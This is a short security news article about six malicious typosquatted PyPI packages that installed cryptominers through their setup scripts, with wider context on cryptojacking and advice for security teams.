Sonatype researchers have recently discovered malicious packages in PyPI, a software code repository, that turns developers’ workstations into cryptomining machines.
A supply-chain attack
Every malicious package could be exploited to trigger a supply-chain attack, impacting different projects with infostealers or cryptominers.
Experts found six malicious packages, namely maratlib, maratlib1, matplatlib-plus, mllearnlib, mplatlib, and learninglib hidden inside the PyPI repository.
The same user uploaded all the malicious packages in an attempt to trick developers into downloading them and it worked.
There were about 5,000 downloads since April, even though there were instances of misspelled names of legitimate Python projects.
Actors embedded malicious code in setup[.]py file, a build script that would execute during the installation.
Diving into the details
Open-source code repositories such as PyPI, GitHub, or RubyGems are under constant attack from threat actors to mine cryptocurrency.
While studying this particular case, researchers found that actors attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available.
Further, it was found that the script’s role was to run Ubqminer cryptominer on the compromised machines.
In a separate attempt, the script contained another cryptomining program that utilizes GPU power, the open-source T-Rex.
Cryptocurrency makes an effective target
There is currently an incessant series of attacks against cryptocurrency platforms and their users.
Threat actors were found mailing fake replacement devices to Ledger customers to steal from their cryptocurrency wallets. The data of 272,853 people who purchased a Ledger device was exposed in a December breach.
According to research, cryptojacking is one of the most common discussion topics that hackers resort to dominate in cybercriminal forums.
Moreover, a report suggested that Australians paid over two million dollars in BTC and other cryptocurrencies to cybercriminals last year.
A fourfold spike in cryptomining attacks was observed during Q1, 2020, as the price of BTC steeply shot up during that time.
Conclusion
While malware-laced software repositories is a popular technique to carry out supply-chain attacks, cryptojacking activities are a sign of security vulnerabilities at the business end. Security teams are advised to look out for degraded computing performance, processor burnout, or increased electricity consumption. Active response from the developers and maintainers of software repositories is highly recommended.